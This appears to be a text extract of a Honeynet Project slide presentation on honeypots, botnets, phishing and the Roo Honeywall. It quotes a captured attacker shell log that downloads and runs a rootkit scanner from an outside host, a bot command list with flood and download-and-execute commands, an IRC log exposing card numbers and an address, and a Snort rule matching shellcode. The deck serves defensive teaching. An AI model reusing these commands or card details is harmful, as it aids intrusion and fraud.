Title: Honeynets and The Honeynet Project
1Honeynets and The Honeynet Project
2Speaker
3Purpose
- To explain our organization, our value to you,
and our research.
4Agenda
- The Honeynet Project and Research Alliance
- The Threat
- How Honeynets Work
- Learning More
5Honeynet Project
6Problem
- How can we defend against an enemy, when we dont
even know who the enemy is?
7Mission Statement
- To learn the tools, tactics, and motives
involved in computer and network attacks, and
share the lessons learned.
8Our Goal
- Improve security of Internet at no cost to the
public. - Awareness Raise awareness of the threats that
exist. - Information For those already aware, we teach
and inform about the threats. - Research We give organizations the capabilities
to learn more on their own.
9Honeynet Project
- Non-profit (501c3) organization with Board of
Directors. - Funded by sponsors
- Global set of diverse skills and experiences.
- Open Source, share all of our research and
findings at no cost to the public. - Deploy networks around the world to be hacked.
- Everything we capture is happening in the wild.
- We have nothing to sell.
10Honeynet Research Alliance
- Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying honeypot
technologies. - http//www.honeynet.org/alliance/
11Alliance Members
- South Florida Honeynet Project
- Georgia Technical Institute
- Azusa Pacific University
- USMA Honeynet Project
- Pakistan Honeynet Project
- Paladion Networks Honeynet Project (India)
- Internet Systematics Lab Honeynet Project
(Greece) - Honeynet.BR (Brazil)
- UK Honeynet
- French Honeynet Project
- Italian Honeynet Project
- Portugal Honeynet Project
- German Honeynet Project
- Spanish Honeynet Project
- Singapore Honeynet Project
- China Honeynet Project
12The Threat
13What we have captured
- The Honeynet Project has captured primarily
external threats that focus on targets of
opportunity. - Little has yet to be captured on advanced
threats, few honeynets to date have been designed
to capture them.
14The Threat
- Hundreds of scans a day.
- Fastest time honeypot manually compromised, 15
minutes (worm, under 60 seconds). - Life expectancies vulnerable Win32 system is
under three hours, vulnerable Linux system is
three months. - Primarily cyber-crime, focus on Win32 systems and
their users. - Attackers can control thousands of systems
(Botnets).
15The Threat
16The Motive
- Motives vary, but we are seeing more and more
criminally motivated. - Several years ago, hackers hacked computers.
Now, criminals hack computers. - Fraud, extortion and identity theft have been
around for centuries, the net just makes it
easier.
17DDoS for Money
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount and I'll take
bla bla offline for this amount of
time J1LL it was illegal last I checked J4ck
heh, then everything you do is illegal. Why not
make money off of it? J4ck I know plenty of
people that'd pay exorbatent amounts for
packeting
18The Target
- The mass users.
- Tend to be non-security aware, making them easy
targets. - Economies of scale (its a global target).
19Interesting Trends
- Attacks often originate from economically
depressed countries (Romania is an example). - Attacks shifting from the computer to the user
(computers getting harder to hack). - Attackers continue to get more sophisticated.
20The Tools
- Attacks used to be primarily worms and
autorooters. - New advances include Botnets and Phishing.
- Tools are constantly advancing.
21The Old Days
Jan 8 184812 HISTORY PID1246 UID0 lynx
www.becys.org/LUCKROOT.TAR Jan 8 184831
HISTORY PID1246 UID0 y Jan 8 184845 HISTORY
PID1246 UID0 tar -xvfz LUCKROOT.TAR Jan 8
184859 HISTORY PID1246 UID0 tar -xzvf Lu Jan
8 184901 HISTORY PID1246 UID0 tar -xzvf
L Jan 8 184903 HISTORY PID1246 UID0 tar
-xzvf LUCKROOT.TAR Jan 8 184906 HISTORY
PID1246 UID0 cd luckroot Jan 8 184913
HISTORY PID1246 UID0 ./luckgo 216 210 Jan 8
185107 HISTORY PID1246 UID0 ./luckgo 200
120 Jan 8 185143 HISTORY PID1246 UID0
./luckgo 64 120 Jan 8 185200 HISTORY PID1246
UID0 ./luckgo 216 200
22Botnets
- Large networks of hacked systems.
- Often thousands, if not tens of thousands, of
hacked systems under the control of a single
user. - Automated commands used to control the zombies.
23How They Work
- After successful exploitation, a bot uses TFTP,
FTP, or HTTP to download itself to the
compromised host. - The binary is started, and connects to the
hard-coded master IRC server. - Often a dynamic DNS name is provided rather than
a hard coded IP address, so the bot can be easily
relocated. - Using a special crafted nickname like USA743634
the bot joins the master's channel, sometimes
using a password to keep strangers out of the
channel
2480 of traffic
- Port 445/TCP
- Port 139/TCP
- Port 135/TCP
- Port 137/UDP
- Infected systems most often WinXP-SP1 and Win2000
25Bots
ddos.synflood host time delay port starts
an SYN flood ddos.httpflood url number
referrer recursive truefalse starts a
HTTP flood scan.listnetranges list scanned
netranges scan.start starts all enabled
scanners scan.stop stops all scanners http.downl
oad download a file via HTTP http.execute updates
the bot via the given HTTP URL http.update execu
tes a file from a given HTTP URL cvar.set
spam_aol_channel channel AOL Spam - Channel
name cvar.set spam_aol_enabled 1/0 AOL Spam -
Enabled?
26Numbers
- Over a 4 months period
- More then 100 Botnets were tracked
- One channel had over 200,000 IP addresses.
- One computer was compromised by 16 Bots.
- Estimate over 1 millions systems compromised.
27Botnet Economy
- Botnets sold or for rent.
- Saw Botnets being stolen from each other.
- Observed harvesting of information from all
compromised machines. For example, the operator
of the botnet can request a list of CD-keys (e.g.
for Windows or games) from all bots. These
CD-keys can be sold or used for other purposes
since they are considered valuable information.
28Phishing
- Social engineer victims to give up valuable
information (login, password, credit card number,
etc). - Easier to hack the user then the computers.
- Need attacks against instant messaging.
- http//www.antiphishing.org
29The Sting
30Getting the Info
31Infrastructure
- Attackers build network of thousands of hacked
systems (often botnets). - Upload pre-made pkgs for Phishing.
- Use platforms for sending out spoofed email.
- Use platforms for false websites.
32A Phishing Rootkit
- -rw-r--r-- 1 free web 14834 Jun 17 1316
ebay only - -rw-r--r-- 1 free web 247127 Jun 14 1958
emailer2.zip - -rw-r--r-- 1 free web 7517 Jun 11 1153
html1.zip - -rw-r--r-- 1 free web 10383 Jul 3 1907
index.html - -rw-r--r-- 1 free web 413 Jul 18 2209
index.zip - -rw-r--r-- 1 free web 246920 Jun 14 2038
massmail.tgz - -rw-r--r-- 1 free web 8192 Jun 12 0718
massmail.zip - -rw-r--r-- 1 free web 12163 Jun 9 0131
send.php - -rw-r--r-- 1 free web 2094 Jun 20 1149
sendspamAOL1.tgz - -rw-r--r-- 1 free web 2173 Jun 14 2258
sendspamBUN1.tgz - -rw-r--r-- 1 free web 2783 Jun 15 0021
sendspamBUNzip1.zip - -rw-r--r-- 1 free web 2096 Jun 16 1846
sendspamNEW1.tgz - -rw-r--r-- 1 free web 1574 Jul 11 0108
sendbank1.tgz - -rw-r--r-- 1 free web 2238 Jul 18 2307
sendbankNEW.tgz - -rw-r--r-- 1 free web 83862 Jun 9 0956
spamz.zip - -rw-r--r-- 1 free web 36441 Jul 18 0052
usNEW.zip - -rw-r--r-- 1 free web 36065 Jul 11 1704
bank1.tgz - drwxr-xr-x 2 free web 49 Jul 16 1226 banka
- -rw-r--r-- 1 free web 301939 Jun 8 1317
www1.tar.gz
33Credit Cards Exchanging
045516 COCO_JAA !cc 045523 Chk 0,19(0
COCO_JAA 9)0 CC for U 4,1 Bob JohnsP. O.
Box 126Wendel, CA 25631United
States510-863-48844407070000588951 06/05
(All This ccs update everyday From My Hacked
shopping Database - You must regular come here
for got all this ccs) 8 9(11 TraDecS Chk_Bot
FoR goldcard9) 045542 COCO_JAA !cclimit
4407070000588951 045546 Chk 0,19(0 COCO_JAA
9)0 Limit for Ur MasterCard (5407070000788951)
0.881 (This Doesn't Mean Its Valid) 4 0(11
TraDecS Chk_bot FoR channel) 045655 COCO_JAA
!cardablesite 045722 COCO_JAA !cardable
electronics 045727 Chk 0,19(0 COCO_JAA 9)0
Site where you can card electronics 9(11
TraDecS Chk_bot FoR goldcard9) 045809
COCO_JAA !cclimit 4234294391131136 045812
Chk 0,19(0 COCO_JAA 9)0 Limit for Ur Visa
(4264294291131136) 9.697 (This Doesn't Mean
Its Valid) 4 0(11 TraDecS Chk_bot FoR channel)
34The Future
- Hacking is profitable and difficult to get
caught. - Expect more attacks to focus on the end user or
the client. - Expect things to get worse, bad guys adapt faster.
35Honeynets
36Honeypots
- A honeypot is an information system resource
whose value lies in unauthorized or illicit use
of that resource. - Has no production value, anything going to or
from a honeypot is likely a probe, attack or
compromise. - Primary value to most organizations is
information. -
37Advantages
- Collect small data sets of high value.
- Reduce false positives
- Catch new attacks, false negatives
- Work in encrypted or IPv6 environments
- Simple concept requiring minimal resources.
38Disadvantages
- Limited field of view (microscope)
- Risk (mainly high-interaction honeypots)
39Types
- Low-interaction
- Emulates services, applications, and OSs.
- Low risk and easy to deploy/maintain, but capture
limited information. - High-interaction
- Real services, applications, and OSs
- Capture extensive information, but high risk and
time intensive to maintain.
40Examples of Honeypots
Low Interaction
- BackOfficer Friendly
- KFSensor
- Honeyd
- Honeynets
High Interaction
41Honeynets
- High-interaction honeypot designed to capture
in-depth information. - Information has different value to different
organizations. - Its an architecture you populate with live
systems, not a product or software. - Any traffic entering or leaving is suspect.
42How it works
- A highly controlled network where every packet
entering or leaving is monitored, captured, and
analyzed. - Data Control
- Data Capture
- Data Analysis
http//www.honeynet.org/papers/honeynet/
43Honeynet Architecture
44Data Control
- Mitigate risk of honeynet being used to harm
non-honeynet systems. - Count outbound connections.
- IPS (Snort-Inline)
- Bandwidth Throttling
45No Data Control
46Data Control
47Snort-Inline
alert tcp EXTERNAL_NET any -gt HOME_NET 53
(msg"DNS EXPLOIT named"flags A
content"CD80 E8D7 FFFFFF/bin/sh" alert tcp
EXTERNAL_NET any -gt HOME_NET 53 (msg"DNS
EXPLOIT named"flags A content"CD80 E8D7
FFFFFF/bin/sh" replace"0000 E8D7
FFFFFF/ben/sh")
48Data Capture
- Capture all activity at a variety of levels.
- Network activity.
- Application activity.
- System activity.
49Sebek
- Hidden kernel module that captures all host
activity - Dumps activity to the network.
- Attacker cannot sniff any traffic based on magic
number and dst port.
50Sebek Architecture
51Honeywall CDROM
- Attempt to combine all requirements of a
Honeywall onto a single, bootable CDROM. - May, 2003 - Released Eeyore
- May, 2005 - Released Roo
52Eeyore Problems
- OS too minimized, almost crippled. Could not
easily add functionality. - Difficult to modify since LiveCD.
- Limited distributed capabilities
- No GUI administration
- No Data Analysis
- No international or SCSI support
53Roo Honeywall CDROM
- Based on Fedora Core 3
- Vastly improved hardware and international
support. - Automated, headless installation
- New Walleye interface for web based
administration and data analysis. - Automated system updating.
54Installation
- Just insert CDROM and boot, it installs to local
hard drive. - After it reboots for the first time, it runs a
hardening script based on NIST and CIS security
standards. - Following installation, you get a command prompt
and system is ready to configure.
55First Boot
56Install
57Configure
583 Methods to Maintain
- Command Line Interface
- Dialog Interface
- Web GUI (Walleye)
59Command Line Interface
- Local or SSH access only.
- Use the utility hwctl to modify configurations
and restart services. - hwctl HwTCPRATE30
60Dialog Menu
61Data Administration
62Data Analysis
- Most critical part, the purpose of a honeynet is
to gather information and learn. - Need a method to analyze all the different
elements of information. - Walleye is the new solution, comes with the CDROM.
63Walleye
64Data Analysis
65Data Analysis Flows
66Data Analysis Details
67Processes
68Files
69Distributed Capabilities
70Issues
- Require extensive resources to properly maintain.
- Detection and anti-honeynet technologies have
been introduced. - Can be used to attack or harm other non-Honeynet
systems. - Privacy can be a potential issue.
71Legal Contact for .mil / .gov
- Department of Justice Computer Crime and
Intellectual Property Section. - Paul Ohm
- Number (202) 514.1026
- E-Mail paul.ohm_at_usdoj.gov
72Learning More
73Our Website
- Know Your Enemy papers.
- Scan of the Month Challenges
- Latest Tools and Technologies
- http//www.honeynet.org/
74Our Book
http//www.honeynet.org/book
75Sponsoring
Advanced Network Management Lab
YOU?
76How to Sponsor
- Sponsor development of a new tool
- Sponsor authorship of a new research paper.
- Sponsor research and development.
- Buy our book
ltproject_at_honeynet.orggt http//www.honeynet.org/fun
ds/
77Conclusion
- The Honeynet Project is a non-profit, research
organization improving the security of the
Internet at no cost to the public by providing
tools and information on cyber security threats.
78- http//www.honeynet.org
- ltproject_at_honeynet.orggt